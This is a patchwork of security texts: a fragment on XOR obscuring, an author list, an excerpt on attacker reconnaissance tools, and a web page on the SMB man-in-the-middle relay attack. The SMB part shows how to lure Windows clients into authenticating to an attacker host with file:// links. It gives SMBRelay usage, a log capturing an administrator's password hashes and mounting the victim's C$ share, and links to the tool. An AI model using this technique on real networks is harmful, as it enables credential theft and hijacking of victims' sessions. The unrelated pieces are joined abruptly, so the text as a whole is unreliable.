analysis because even though the letters are substituted, the ultimate frequency
appearance of each letter will roughly correspond to the known frequency characteristics
of the language.
Other Ways to Hide Information
Sometimes vendors follow the old “security through obscurity” approach, and
instead of using strong cryptography to prevent unauthorized disclosure of certain
information, they just try to hide the information using a commonly known
reversible algorithm like UUEncode or Base64, or a combination of two simple
methods. In these cases, all you need to do to recover the cleartext is to pass the
ciphertext back through the same engine.Vendors may also use XOR encoding
against a certain key, but you won’t necessarily need the key to decode the message.
Let’s look at some of the most common of these algorithms in use.
XOR
While many of the more complex and secure encryption algorithms use XOR
as an intermediate step, you will often find data obscured by a simple XOR
operation. XOR is short for exclusive or, which identifies a certain type of binary
operation with a truth table as shown in Table 6.2. As each bit from A is combined
with B, the result is “0” only if the bits in A and B are identical. Otherwise,
the result is 1.
Table 6.2 XOR Truth Table
A B A XOR B
0 0 0
0 1 1
1 0 1
1 1 0
Let’s look at a very simple XOR operation and how you can undo it. In our
simple example, we will use a single character key (“a”) to obscure a single character
message (“b”) to form a result that we’ll call “ciphertext” (see Table 6.3).
Table 6.3 XOR of “a” and “b”
Item Binary Value
a 01100001
b 01100010
ciphertext 00000011
Suppose that you don’t know what the value of “a” actually is, you only
know the value of “b” and the resulting “ciphertext.”You want to recover the key
so that you can find out the cleartext value of another encrypted message,
“cipher2,” which is 00011010.You could perform an XOR with “b” and the
“ciphertext” to recover the key “a,” as shown in Table 6.4.
Table 6.4 XOR of “ciphertext” and “b”
Item Binary Value
ciphertext 00000011
b 01100010
a 01100001

David R. Mirza Ahmad
Ido Dubrawsky
Hal Flynn
Joseph “Kingpin” Grand
Robert Graham
Norris L. Johnson, Jr.
K2
Dan “Effugas” Kaminsky
F. William Lynch
Steve W. Manzuik
Ryan Permeh
Ken Pfeil
Rain Forest Puppy
Ryan Russell Technical Editor

# Information Gathering

Many companies only concentrate on protecting their systems from a
specific exploit when they start building a security infrastructure. They
figure out what patches need to be applied to their systems, and after
they apply them, they think they are secure. However, they do not realize
that through reconnaissance and information gathering, an attacker can
acquire a large amount of information about their sites.

Before an attacker can run an exploit, he needs to understand the
environment he is going after. In doing so, he needs to gather preliminary
information about the number of machines, type of machines, operating
systems, and so forth. If someone was going to rob a bank, they would
not just wake up one day and randomly pick a target. They would scope
out the possible targets and gather information about how the bank
works, where the guards stand, when they change shifts, possible

weaknesses that can be exploited, and based on that information, they
would decide not only which target to attack, but how to attack it. No
matter what the target is, before an attacker goes after it, he has to
gather as much information as possible, so his chances of success are
very high. In most cases, whether an attack is successful or not is directly
related to how much information was gathered about the target. As you
will see, if an attacker performs the information gathering stage correctly
and in enough detail, access is almost guaranteed.

Therefore, it is key for a company to know what information an attacker
can acquire about it and minimize the potential damage. When I perform
security assessments, I perform information gathering against a company
to try to find out its points of vulnerability. In doing so, I acquire a lot of
useful information about the site. In some cases, I take the information
and produce a network map of the company, and in several cases, the end
result was a better map than the companie’s IT department had. The
question I pose is this: After an attacker has a detailed map of your
network and knows exactly what software and versions are running on
each machine, how hard is it for him to successfully exploit your network?
The answer is simple. After someone has that much information, the
network is as good as compromised. Therefore, it is key that an attacker
only gains limited information about a network

Steps for Gathering Information :)

The following are the seven basic steps an attacker would take to gather
information about a target. After each step are some of the tools an
attacker would use to gain the information he needs to exploit the target:

1. Find out initial information:
o Open Source
o Whois
o Nslookup
2. Find out address range of the network:
o ARIN (American registry for internet numbers)
o Traceroute
3. Find active machines:
o ping
4. Find open ports or access points:
o Portscanners:
o Nmap
o ScanPort
o War Dialers
o THC-Scan
5. Figure out the operating systems:
o Queso
o nmap
6. Figure out which services are running on each port:
o Default port and OS
o Telnet
o Vulnerability scanners
7. Map out the network:
o Traceroute
o Visual ping
o Cheops
we will take a look at each of the seven steps and
examine how each of the tools work. Not only will we see how they can be
used by an attacker to compromise a system, but we will show you how to
use them to protect your system. Most people have a negative view
towards tools that can be used to compromise systems because they fail
to realize the benefit of using these tools. If you understand and use these
tools on a regular basis, they can be used to increase the security of your
site. Also, if you use them to increase your security and protect your site,
then the value of these tools to an attacker decreases. The thing to learn
from this chapter is that these tools should be embraced. The more you
know and understand how an attacker breaks into a network helps you
increase the security at your site. After we cover all the steps and tools,
we will finish the chapter with an example of red teaming, which shows
how you can simulate an attack to determine and fix your vulnerabilities
before a real attacker exploits them.

ERIC COLE

# The SMB
(Man-In-The-Middle Attack)


Because Windows automatically tries to log in as the current user if no other authentication information
is explicitly supplied, if an attacker can force a NetBIOS connection from its target it can retrieve the
user authentication information of the currently logged in user. L0pht Crack's FAQ mentions this as a
way to retrieve password hashes from remote networks for cracking. There are a number of ways to
force a Windows machine to establish a NetBIOS connection, their FAQ reccomends sending an email
with a link to file://1.2.3.4/share/whatever.html so that if the user clicks on it, it connects to 1.2.3.4's
NetBIOS server as the currently logged in user transmitting the hashed password information.

It is actually very easy to force a NetBIOS connection, simply have any web browser or IE API
(WinInet) based app view html that includes an image with a source URL like file://1.2.3.4/share/
whatever.gif or use NBNAME /RESPOND to return the attacker's IP address in response to name
queries, find a remotely accessible service (such as ftp server or http server) that doesn't properly
parse or check user supplied paths or filenames and supply it with a filename like \\1.2.3.4\share
\whatever.gif, and I'm sure there are many other ways yet to be discovered/revealed.

Man in the middle attacks are an old concept. However, when a target host can be forced to
authenticate with an attacker and the credentials used are also valid on the server portion of the target,
it becomes possible to gain access to that server as whatever user the target's client is trying to
authenticate as. This is accomplished by acting as a man in the middle to both the server and the client
portions of the target. This same method could be use to gain access to any server the authentication
information issued by the target client is valid on (for instance, any other server in the same domain).
After the authentication has been completed, the target's client is disconnected and the attacker
remains connected to the target's server as whatever user the target is logged in as, hijacking the
connection.

SMB uses a challenge-response method of authentication to prevent replay attacks and complicate
cracking. The challenge is 8 bytes of randomly generated data which the client encrypts using the
password as an encryption key. The negotiation flow is usually like this:

Client->Server
Session request, workstation service requests connection to server
service.
Server->Client Session response, yes that NetBIOS name is connectable here.
Client->Server
Negotiation, which dialect do you want to speak with me?
Server->Client
Dialect selection, let's speak this dialect. Here's the challenge data to
encrypt with your password.
Client->Server
Session setup, here's my username and your challenge encrypted
with the password hash I want to logon as.
Server->Client
Session setup response, yes ok you are connected as that user.

To gain access to a server once a NetBIOS connection has been received from a target client, the flow
would be:

Target client->Attacker

file:///C|/Documents%20and%20Settings/mwood/Desktop...0Hacking/The%20SMB%20Man-In-The-Middle%20Attack.htm (1 of 6)8/1/2006 2:40:14 AM
Digital Underground
Session request, workstation service requests connection to some server
name.
Attacker->Target server
Session request, some workstation requests connection to server service.
Target Server->Attacker
Session response, yes you can connect to that name.
Attacker->Target client
Session response, yes you can connect to that name.
Target client->Attacker
Negotiation, which dialect do you want to talk?
Attacker->Target server
Negotiation, would you like to talk to me as if I'm an NT 4 box without
extended security?
Target server->Attacker
Dialect selection, ok let's talk that way, here's my challenge.
Attacker->Target client
Dialect selection, let's speak this way, here's a challenge.
Target client->Attacker
Session setup, here's my username and password encrypted with your
challenge.
Attacker->Target server
Session setup, here's the username and encrypted password I want to logon
as.
Target server->Attacker
Session setup response, ok you are connected now.
Attacker->Target client
*snip*
Attacker->Target server
(Attacker does whatever the target client user can do)

Once connected, a target can verify the relayed connection using:

net session

SMBRelay

Smbrelay is a program that receives a connection on port 139, connects back to the connecting
computer's port 139 or to another target server, and relays the packets between the client and server of
the connecting Windows machine, making modifications to these packets when necessary.

After connecting and authenticating it disconnects the target client and binds to port 139 on a new IP
address. This IP address (the relay address) can then be connected to directly from windows using
"net use \\192.1.1.1"
and then used by all of the networking built into Windows. It relays all the SMB trafic, except for the
negotiation and authentication. You can disconnect from and reconnect to this virtual IP as long as the
target host stays connected.

SMBRelay is multi-threaded and handles multiple connections simultaneously. It will create new IP
addresses sequentially, removing them when the target host disconnects. It will not allow the same IP
address to connect twice, unless a successful connection to that target was achieved and

file:///C|/Documents%20and%20Settings/mwood/Desktop...0Hacking/The%20SMB%20Man-In-The-Middle%20Attack.htm (2 of 6)8/1/2006 2:40:14 AM Digital Underground

disconnected. If this happens, it may use the same same relay address again for another connection.

SMBRelay collects the NTLM password hashes transmitted and writes them to hashes.txt in a format
usable by L0phtcrack so the passwords can be cracked later.

Usage: smbrelay [options]
Options:
/D num - Set debug level, current valid levels: 0 (none), 1, 2
Defaults to 0
/E - Enumerates interfaces and their indexes
/F[-] - Fake server only, capture password hashes and do not relay
Use - to disable acting as a fake server if relay fails
/IL num - Set the interface index to use when adding local IP addresses
/IR num - Set the interface index to use when adding relay IP addresses
Defaults to 1. Use /E to display the adapter indexes
/L[+] IP - Set the local IP to listen on for incoming NetBIOS connections
Use + to first add the IP address to the NIC
Defaults to primary host IP
/R[-] IP - Set the starting relay IP address to use
Use - to NOT first add each relay IP address to the NIC
Defaults to 192.1.1.1
/S name - Set the source machine name
Defaults to CDC4EVER /T IP - Connect to target IP instead of back to the incoming address

c:\>smbrelay /I 2 /D 1

SMBRelay v0.98 - TCP (NetBT) level SMB man-in-the-middle relay attack
Copyright 2001: Sir Dystic, Cult of the Dead Cow
Send complaints, ideas and donations to sirdystic@cultdeadcow.com
Bound to port 139 on address 11.11.11.11
Connection from 60.61.62.63:1140
Request type: Session Request 72 bytes
Source name: BOB <00>
Target name: *SMBSERVER <20>
Setting target name to source name and source name to 'CDC4EVER'...Response:
Positive Session Response 4 bytes

Request type: Session Message 174 bytes
SMB_COM_NEGOTIATE
Response: Session Message 99 bytes
Challenge (8 bytes): 268B11C361473D20

Request type: Session Message 278 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password: 59A8A04CC37D226F0AC44065C84FDF9FEB1BB611C3CBE936
Case sensitive password: 8BA548AF1F9A517BBFBEF4E53D1D8B5D94E81C5523E7B251
Username: "administrator"
Domain: "BOB"
OS: "Windows NT 1381"
Lanman type: ""
Response: Session Message 148 bytes
OS: "Windows NT 4.0"
Lanman type: "NT LAN Manager 4.0"
Domain: "BOBSMITH"
Password hash written to disk
Connected?
Bound to port 139 on address 192.1.1.1 relaying for host BOB 60.61.62.63
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
D:\>net use \\192.1.1.1
The command completed successfully.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

*** Relay connection for target BOB received from 11.11.11.11:1472
Relay request type: Session Request 72 bytes, 72 target BOB
*** Sent positive session response for relay target BOB
Relay request type: Session Message 174 bytes, 174 target BOB
BOB:SMB_COM_NEGOTIATE 174 bytes
0 - Dialect 2 - PC NETWORK PROGRAM 1.0
1 - Dialect 2 - XENIX CORE
2 - Dialect 2 - MICROSOFT NETWORKS 1.03
3 - Dialect 2 - LANMAN1.0
4 - Dialect 2 - Windows for Workgroups 3.1a
5 - Dialect 2 - LM1.2X002
6 - Dialect 2 - LANMAN2.1
*** Sent dialect selection response (7) for target BOB
Relay request type: Session Message 260 bytes, 260 target BOB
BOB:SMB_COM_SESSION_SETUP_ANDX 260 bytes
*** Sent SMB Session setup response for relay to BOB
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
D:\>net use z: \\192.1.1.1\c$
The command completed successfully.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Relay request type: Session Message 136 bytes, 136 target BOB
BOB:SMB_COM_SESSION_SETUP_ANDX 136 bytes
Received 132 byte response from target BOB
Relay request type: Session Message 81 bytes, 81 target BOB
BOB:SMB_COM_TREE_CONNECT_ANDX 81 bytes
Received 56 byte response from target BOB
Received request header, expecting 4 bytes for target BOB
Relay request type: Session Keep Alive 4 bytes, 4 target BOB

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
D:\>net use * /d /y
The command completed successfully.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Relay request type: Session Message 39 bytes, 39 target BOB
BOB:SMB_COM_TREE_DISCONNECT 39 bytes
Received 39 byte response from target BOB
Relay request type: Session Message 39 bytes, 39 target BOB
BOB:SMB_COM_TREE_DISCONNECT 39 bytes
Received 39 byte response from target BOB
Relay request type: Session Message 43 bytes, 43 target BOB
BOB:SMB_COM_LOGOFF_ANDX 43 bytes
*** Logoff from target BOB
*** Relay disconnected from target BOB
Bound to port 139 on address 192.1.1.1 relaying for host BOB 60.61.62.63
Deleted relay IP address 192.1.1.1 for target BOB
*** Target BOB Disconnected
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Notes on using SMBRelay:
SMBRelay must first bind to port 139 to receive the incoming NetBIOS connections. First of all,
because this port is below 1024 it is a priveleged port and requires administrator access to use.
Administrator access is also required to add and remove IP addresses which SMBRelay does in its
normal mode of operation. So SMBRELAY MUST RUN AS AN ADMINISTRATOR ACCESS
ACCOUNT.

SMBRelay targets and runs best on Windows NT and 2000 machines. Connections from 9x and ME
boxes will have unpredictable results.

On Win2K SMBRelay will not be able to bind to port 139 if the system is already using it because of a
new socket flag Microsoft added to specifically prevent other applications from re-using a port the
system is using. The easiest thing to do is to use the /L+ option to create a new IP address on your NIC
and have the target connect to that address rather than your primary. Another way is to manually add a
new IP address through your control panel and then use /L to specify that address.

SMBRelay will bind in front of the OS on port 139 if it can, but just because it is able to bind
successfully doesn't mean that the program will actually receive the incoming connections. If there are
any existing connections to the system (even in the TIME_WAIT state) when SMBRelay binds to the
port, it will probably not receive any of the connections. Under Windows 98 it never seems to receive
any connections. Under Windows NT, even under best circumstances it only sometimes receives the
connections. Because of this I usually run several coppies of SMBRelay hopefully increasing the
chances of SMBRelay getting the connections instead of the system. Under Windows 2000 the OS
prevents SMBRelay from binding to the port while the OS is using it.

To create a new IP address on your computer, you must specify the interface index of the adapter to
use using the /IR and/or /IL options. Use /E to list the interface indexes available. Under NT the
indexes are nice simple numbers, but under 2K they use high bits so the indexes are represented as
hex numbers. If you do not use the /IR option to set the relay interface it will default to 1, which is
usually the loopback interface. This will allow you to connect only from your own box.

SMBRelay should run on an NT or 2K box, but MAY run on a 98 box if it is configured correctly.

However, the relaying may not work for a 98 box.

The FIRST thing that must be done to connect to the relay address is:
NET USE \\192.1.1.1
After that you can do anything else to the target directly through Windows networking using the relay IP
address host name (like \\192.1.1.1).
[SMBRelay Win32 source And Binary]

SMBRelay2

SMBRelay2 works at the NetBIOS level, and should work across any protocol NetBIOS is bound to
(such as NetBEUI or TCP/IP). Rather than using IP addresses, SMBRelay2 uses NetBIOS names. It
also supports mitm'ing to a third host. However, it currently supports listening on only one name, so the
target must attempt to connect to that name for SMBRelay2 to operate (the local name), so the target
must attempt to access a resource on LocalName.

SMBRelay2 [Options]
Options:
/A LanaNum - Use LanaNum
Defaults to 0
/D DebugLevel - Level of debug messages, valid levels 0 - 3
Defaults to 0
/L LocalName - Listen for primary connection on LocalName
Defaults to SERVER
/R RelayName - Listen for relay connection on RelayName
Defaults to RELAY
/S SourceName - Use SourceName when connecting to target
Defaults to CDC4EVER
/T TargetName - Connect to TargetName for relay
Defaults to connecting back to client
[SMBRelay2 Win32 source And Binary]
Digital Underground

Posted in Ethical Hacking